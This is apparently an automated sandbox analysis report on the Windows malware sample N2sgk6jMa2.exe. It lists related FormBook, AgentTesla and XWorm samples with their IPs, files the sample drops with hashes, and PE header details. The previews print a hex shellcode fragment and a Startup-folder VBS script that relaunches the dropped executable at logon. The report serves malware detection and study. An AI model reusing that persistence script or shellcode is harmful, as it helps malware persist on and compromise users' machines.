	13820099133-PHOTO.lnk	Get hash	malicious	FormBook	Browse	85.159.66.93
	cbIcBAgY5W.exe	Get hash	malicious	SystemBC	Browse	94.73.188.24
	td2RgV6HyP.exe	Get hash	malicious	SystemBC	Browse	94.73.188.24
	Utility R.lnk	Get hash	malicious	FormBook	Browse	85.159.66.93
	CTe 002-8-0167948-2.exe	Get hash	malicious	AgentTesla	Browse	94.73.188.44
	Offer Document 23.lnk	Get hash	malicious	FormBook	Browse	85.159.66.93
	qtCWL0lgfX.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Offer Document 24.lnk	Get hash	malicious	FormBook	Browse	85.159.66.93
	file.exe	Get hash	malicious	Unknown	Browse	89.19.30.89
SEDO-ASDE	13820099132-PHOTO.lnk	Get hash	malicious	FormBook	Browse	91.195.240.94
	13820099133-PHOTO.lnk	Get hash	malicious	FormBook	Browse	91.195.240.94
	IMG_20240605_187343_JPG.cmd	Get hash	malicious	DBatLoader, FormBook	Browse	91.195.240.19
	eNXDCIvEXI.exe	Get hash	malicious	FormBook	Browse	91.195.240.123
	WtboJk1g7r.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	H25iQbxCki.exe	Get hash	malicious	FormBook	Browse	91.195.240.123
	http://epic.catholicheath.net/Citrix/EPICWeb/	Get hash	malicious	Unknown	Browse	91.195.240.14
	pp0fHVNbib.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	staff record or employee record.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	ulACwpUCSU.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
CLOUDFLARENETUS	17178602463c6b4cdf436b48ec4c5dbc6aee5ae0da7ee001e248c7e98692d8d99ecd71b334854.dat-decoded.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	172.67.215.45
	Paymentxx212093.vbs	Get hash	malicious	PureLog Stealer, XWorm	Browse	172.67.221.70
	DHL.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	17178602463c6b4cdf436b48ec4c5dbc6aee5ae0da7ee001e248c7e98692d8d99ecd71b334854.dat-decoded.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	188.114.96.3
	MB263350411AE.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	NAGSMA inv. 239 - Telesca P..xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.17.96.13
	13820099132-PHOTO.lnk	Get hash	malicious	FormBook	Browse	23.227.38.74
	13820099133-PHOTO.lnk	Get hash	malicious	FormBook	Browse	23.227.38.74
	Paymentxx212093.vbs	Get hash	malicious	XWorm	Browse	104.21.91.138
	Bestellung A24-00342B13692.xls	Get hash	malicious	Unknown	Browse	172.67.135.214

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Marquand

Download File

Process:	C:\Users\user\Desktop\N2sgk6jMa2.exe
File Type:	AmigaOS bitmap font (TFCH) "\2730WSN\025\264\246C\336\370\312\217", tfc_TagCount 12375, tfc_YSize 21326, 7952 elements, 2nd "NjQ0IM6QRFQ6@X\032\303S0GSN]7NJU IO&QRFQ6BHZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6"
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.994251497511753
Encrypted:	true
SSDEEP:	6144:Yd9qUqrAfBCcSgHQDv45HRkJoiuccsQTIOqRTTU/r:yQUzYcSg8v45HRkJoi376CRTY/r
MD5:	CEAA69CFFCE37A5A57E4879C0A1AC08C
SHA1:	22927EDA9158670266035E688A7D3A792D59CBA9
SHA-256:	A945B9FCA774A0A18C17CCB0DD2C9A52B8CFC8692D42B80A6A299180DF1027B4
SHA-512:	5B48F9FD0086A5D5C2B4EA311BD35E03352C85B79BF96EDC3A075973A7C2F0237726F32A25D24F5FE182329B883A15B120A51168774E0379CFB26EB7BF9C093F
Malicious:	false
Reputation:	low
Preview:	.....0WSN...C.....RE...pYJ...SNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU.IO6_M._6.Q.c.1..o._'9u@; Q#3+qU#64-'.56n?B j<^i.y.r+>R'vWOY.WSNM7NJ,1@..15.lV%.g"4.M....-....m2!.,..~3W..'._s2.IO6QRFQ6..ZB.1VS.%..JU0IO6QR.Q4CS[IS0GWNM7NJU0IO.DRFQ&BXZbW0WS.M7^JU0KO6WRFQ6BXZDS0WSNM7NjQ0IM6QRFQ6@X..S0GSN]7NJU IO&QRFQ6BHZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6.&#)BBXZ.\4WS^M7NZQ0I_6QRFQ6BXZBS0WSnM7.JU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7

C:\Users\user\AppData\Local\Temp\autEC29.tmp

Download File

Process:	C:\Users\user\Desktop\N2sgk6jMa2.exe
File Type:	AmigaOS bitmap font (TFCH) "\2730WSN\025\264\246C\336\370\312\217", tfc_TagCount 12375, tfc_YSize 21326, 7952 elements, 2nd "NjQ0IM6QRFQ6@X\032\303S0GSN]7NJU IO&QRFQ6BHZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6"
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.994251497511753
Encrypted:	true
SSDEEP:	6144:Yd9qUqrAfBCcSgHQDv45HRkJoiuccsQTIOqRTTU/r:yQUzYcSg8v45HRkJoi376CRTY/r
MD5:	CEAA69CFFCE37A5A57E4879C0A1AC08C
SHA1:	22927EDA9158670266035E688A7D3A792D59CBA9
SHA-256:	A945B9FCA774A0A18C17CCB0DD2C9A52B8CFC8692D42B80A6A299180DF1027B4
SHA-512:	5B48F9FD0086A5D5C2B4EA311BD35E03352C85B79BF96EDC3A075973A7C2F0237726F32A25D24F5FE182329B883A15B120A51168774E0379CFB26EB7BF9C093F
Malicious:	false
Reputation:	low
Preview:	.....0WSN...C.....RE...pYJ...SNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU.IO6_M._6.Q.c.1..o._'9u@; Q#3+qU#64-'.56n?B j<^i.y.r+>R'vWOY.WSNM7NJ,1@..15.lV%.g"4.M....-....m2!.,..~3W..'._s2.IO6QRFQ6..ZB.1VS.%..JU0IO6QR.Q4CS[IS0GWNM7NJU0IO.DRFQ&BXZbW0WS.M7^JU0KO6WRFQ6BXZDS0WSNM7NjQ0IM6QRFQ6@X..S0GSN]7NJU IO&QRFQ6BHZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6.&#)BBXZ.\4WS^M7NZQ0I_6QRFQ6BXZBS0WSnM7.JU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7

C:\Users\user\AppData\Local\Temp\autEC58.tmp

Download File

Process:	C:\Users\user\Desktop\N2sgk6jMa2.exe
File Type:	data
Category:	dropped
Size (bytes):	9818
Entropy (8bit):	7.607315902806395
Encrypted:	false
SSDEEP:	192:na0ZsqLUGeKtxWQa88XEeap488Go76G3sXxBJlMUL+FH5x/AILoB+m:azqLFLtx3a880eap48Oq5SH/FsBF
MD5:	E5B3A4706FF16E0FAAAE88A63E1430A5
SHA1:	F96100CFCB26A73EA16F174C2B79141B24266D55
SHA-256:	7ACCFE31A816226EF44F3407BD9EF53BDDD59AA8F43B91E33680C8FF146A3522
SHA-512:	3CCE0E3925F5B96861797104A2FCC2179D96D1737CC6C663A1CE935587C08A0B6BE1BECB2B8CAA63CADD17085CD77CB0C2C9E2B6DC8CEF5E9190180F96E6CFA7
Malicious:	false
Reputation:	low
Preview:	EA06..pD.L&.J...7...sz%..5.M.s...i0.L&....g9..h...g8.Q&4Z5.c3...sY..E........2^&.Y..c.Ll.;..a2....Y..ob.M.@...a6.N'3I..ib....]........K........\|...o..b..`.....8.....9.X.30...,.....2.Z..k9..6.@.o.l..X......g.9...v0..X....N.,.I.........9..&....r.'.Y...c ....Aa.H.......F.3<..Y@.6...$.`....f@...x..j....Br.....Xf.0..l....n...Y&@5_..h....&.5_..p.U.., 5_....U..,.5_..`.U..f@5\..>3...M.^.a.Z..k6.z..o6......@.....3y..G../Z.M. .....jr....n.u....$.`./.o8...f.G_T.......>_.......zk5....i....3 ...................`.M..`... ...c...@..(.'.4.X.{>K...c.MlS@..X..._..p.....>K.#G.b..3\|v9..G.4.X.@8_..kc..i\|v9....c.h.,v..........7.Ml.K5...M..0;..8.Nf.0.L..6i..f..+..ff6)...6.N,....f...E...Y....3.I.....M.......vI.....0.....2p....<d....,vb........N@!+..'& ....,fo2..,.).......r.2.X...c3k$.ef.Y.!...Gf@....,f.9..,.. .#7.....c.0.....y..p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b.!....F ....B5c.L.

C:\Users\user\AppData\Local\Temp\autEF65.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\.exe
File Type:	AmigaOS bitmap font (TFCH) "\2730WSN\025\264\246C\336\370\312\217", tfc_TagCount 12375, tfc_YSize 21326, 7952 elements, 2nd "NjQ0IM6QRFQ6@X\032\303S0GSN]7NJU IO&QRFQ6BHZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6"
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.994251497511753
Encrypted:	true
SSDEEP:	6144:Yd9qUqrAfBCcSgHQDv45HRkJoiuccsQTIOqRTTU/r:yQUzYcSg8v45HRkJoi376CRTY/r
MD5:	CEAA69CFFCE37A5A57E4879C0A1AC08C
SHA1:	22927EDA9158670266035E688A7D3A792D59CBA9
SHA-256:	A945B9FCA774A0A18C17CCB0DD2C9A52B8CFC8692D42B80A6A299180DF1027B4
SHA-512:	5B48F9FD0086A5D5C2B4EA311BD35E03352C85B79BF96EDC3A075973A7C2F0237726F32A25D24F5FE182329B883A15B120A51168774E0379CFB26EB7BF9C093F
Malicious:	false
Reputation:	low
Preview:	.....0WSN...C.....RE...pYJ...SNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU.IO6_M._6.Q.c.1..o._'9u@; Q#3+qU#64-'.56n?B j<^i.y.r+>R'vWOY.WSNM7NJ,1@..15.lV%.g"4.M....-....m2!.,..~3W..'._s2.IO6QRFQ6..ZB.1VS.%..JU0IO6QR.Q4CS[IS0GWNM7NJU0IO.DRFQ&BXZbW0WS.M7^JU0KO6WRFQ6BXZDS0WSNM7NjQ0IM6QRFQ6@X..S0GSN]7NJU IO&QRFQ6BHZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6.&#)BBXZ.\4WS^M7NZQ0I_6QRFQ6BXZBS0WSnM7.JU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7NJU0IO6QRFQ6BXZBS0WSNM7

C:\Users\user\AppData\Local\Temp\autEF95.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\.exe
File Type:	data
Category:	dropped
Size (bytes):	9818
Entropy (8bit):	7.607315902806395
Encrypted:	false
SSDEEP:	192:na0ZsqLUGeKtxWQa88XEeap488Go76G3sXxBJlMUL+FH5x/AILoB+m:azqLFLtx3a880eap48Oq5SH/FsBF
MD5:	E5B3A4706FF16E0FAAAE88A63E1430A5
SHA1:	F96100CFCB26A73EA16F174C2B79141B24266D55
SHA-256:	7ACCFE31A816226EF44F3407BD9EF53BDDD59AA8F43B91E33680C8FF146A3522
SHA-512:	3CCE0E3925F5B96861797104A2FCC2179D96D1737CC6C663A1CE935587C08A0B6BE1BECB2B8CAA63CADD17085CD77CB0C2C9E2B6DC8CEF5E9190180F96E6CFA7
Malicious:	false
Reputation:	low
Preview:	EA06..pD.L&.J...7...sz%..5.M.s...i0.L&....g9..h...g8.Q&4Z5.c3...sY..E........2^&.Y..c.Ll.;..a2....Y..ob.M.@...a6.N'3I..ib....]........K........\|...o..b..`.....8.....9.X.30...,.....2.Z..k9..6.@.o.l..X......g.9...v0..X....N.,.I.........9..&....r.'.Y...c ....Aa.H.......F.3<..Y@.6...$.`....f@...x..j....Br.....Xf.0..l....n...Y&@5_..h....&.5_..p.U.., 5_....U..,.5_..`.U..f@5\..>3...M.^.a.Z..k6.z..o6......@.....3y..G../Z.M. .....jr....n.u....$.`./.o8...f.G_T.......>_.......zk5....i....3 ...................`.M..`... ...c...@..(.'.4.X.{>K...c.MlS@..X..._..p.....>K.#G.b..3\|v9..G.4.X.@8_..kc..i\|v9....c.h.,v..........7.Ml.K5...M..0;..8.Nf.0.L..6i..f..+..ff6)...6.N,....f...E...Y....3.I.....M.......vI.....0.....2p....<d....,vb........N@!+..'& ....,fo2..,.).......r.2.X...c3k$.ef.Y.!...Gf@....,f.9..,.. .#7.....c.0.....y..p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b.!....F ....B5c.L.

C:\Users\user\AppData\Local\Temp\prophetesses

Download File

Process:	C:\Users\user\Desktop\N2sgk6jMa2.exe
File Type:	ASCII text, with very long lines (28740), with no line terminators
Category:	dropped
Size (bytes):	28740
Entropy (8bit):	3.5913419303456418
Encrypted:	false
SSDEEP:	768:WiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+Ie9cr4vfF3if6gyTW:WiTZ+2QoioGRk6ZklputwjpjBkCiw2R5
MD5:	CFF16AD5F8A5182A27670F5BBA0636E3
SHA1:	C91F67C6EBC45A1C1DE9F6A39EC2B433847D27F8
SHA-256:	189DD751EA209961ECF74277B4C26DF9B0C032B10E5A33D578F685CFED0B5DDD
SHA-512:	EAB81410011723E2F0A68F26AC320A439BBC239DF53E3DA7806144FE4FEE8A42C13D168B514C1791A3FCDFCA81878B753E78D3702F1AF7E7B1425623C8B8EF82
Malicious:	false
Reputation:	low
Preview:	606DABF73C37DFE5B6388B40F071263955F8071380D1EFA13173545CE7671ACF380x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c000000668995

C:\Users\user\AppData\Local\directory\.exe

Download File

Process:	C:\Users\user\Desktop\N2sgk6jMa2.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1226752
Entropy (8bit):	7.181259250090175
Encrypted:	false
SSDEEP:	24576:iAHnh+eWsN3skA4RV1Hom2KXMmHaOtBcxkHwFDu6T1D5:lh+ZkldoPK8YaOtOxkHCu8
MD5:	B94B6C27E410388CD4E7DFEB352B75CE
SHA1:	57252799717E32BCCFD57D674C6D44328A17B148
SHA-256:	26833834EFB8D0FF6DFEA4C7CD8A66B89FB8C04E5142A0A077E0DED715098232
SHA-512:	73C8011C9259E8141E1BA4955D251E314DC08D4332977AB0DE661FE1FECE205B68225AB3F1F0602899B150C93A7B5E72BA25F17F8125522886CA8DF051BFF97B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L.....`f.........."...............................@.......................... ............@...@.......@.........................\|...............................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc................4..............@..@.reloc..4q.......r...F..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.vbs

Download File

Process:	C:\Users\user\AppData\Local\directory\.exe
File Type:	data
Category:	dropped
Size (bytes):	260
Entropy (8bit):	3.411616958936925
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfcloRKUEZ+lX1Al1ALlAnriIM8lfQVn:DsO+vNloRKQ1A1M4mA2n
MD5:	9923BCFC3559CA8F8B5D13AFA9790BE0
SHA1:	F68FC7F131CA61367FFC24E5A7779B1806C07B23
SHA-256:	137E91B6D8742A71C768ABE04597971E3021505A784DFBD31205FBA4327B127C
SHA-512:	FA5B97B612D49E4A8A4B901DA40A6EEC730CC61B78E496C365484504E129F613D7A0F92955CDCE4C601ECBDB9B06DB1945C0BE01509772337CBCCF00E78D3DA0
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.181259250090175
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	N2sgk6jMa2.exe
File size:	1'226'752 bytes
MD5:	b94b6c27e410388cd4e7dfeb352b75ce
SHA1:	57252799717e32bccfd57d674c6d44328a17b148
SHA256:	26833834efb8d0ff6dfea4c7cd8a66b89fb8c04e5142a0a077e0ded715098232
SHA512:	73c8011c9259e8141e1ba4955d251e314dc08d4332977ab0de661fe1fece205b68225ab3f1f0602899b150c93a7b5e72ba25f17f8125522886ca8df051bff97b
SSDEEP:	24576:iAHnh+eWsN3skA4RV1Hom2KXMmHaOtBcxkHwFDu6T1D5:lh+ZkldoPK8YaOtOxkHCu8
TLSH:	D045BE0273D1C036FFAB92739B6AB60156BC78254133852F13982DB9BD701B2277E663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6660F294 [Wed Jun 5 23:19:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FC9F4A0852Dh
jmp 00007FC9F49FB2E4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FC9F49FB46Ah
cmp edi, eax
jc 00007FC9F49FB7CEh
bt dword ptr [004C41FCh], 01h
jnc 00007FC9F49FB469h
rep movsb
jmp 00007FC9F49FB77Ch
cmp ecx, 00000080h
jc 00007FC9F49FB634h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FC9F49FB470h
bt dword ptr [004BF324h], 01h
jc 00007FC9F49FB940h
bt dword ptr [004C41FCh], 00000000h
jnc 00007FC9F49FB60Dh
test edi, 00000003h
jne 00007FC9F49FB61Eh
test esi, 00000003h
jne 00007FC9F49FB5FDh
bt edi, 02h
jnc 00007FC9F49FB46Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FC9F49FB473h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FC9F49FB4C5h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x61184	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12a000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x61184	0x61200	a44617b2febb6d1204616374de56cb13	False	0.9326159306628057	data	7.903942808101962	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12a000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
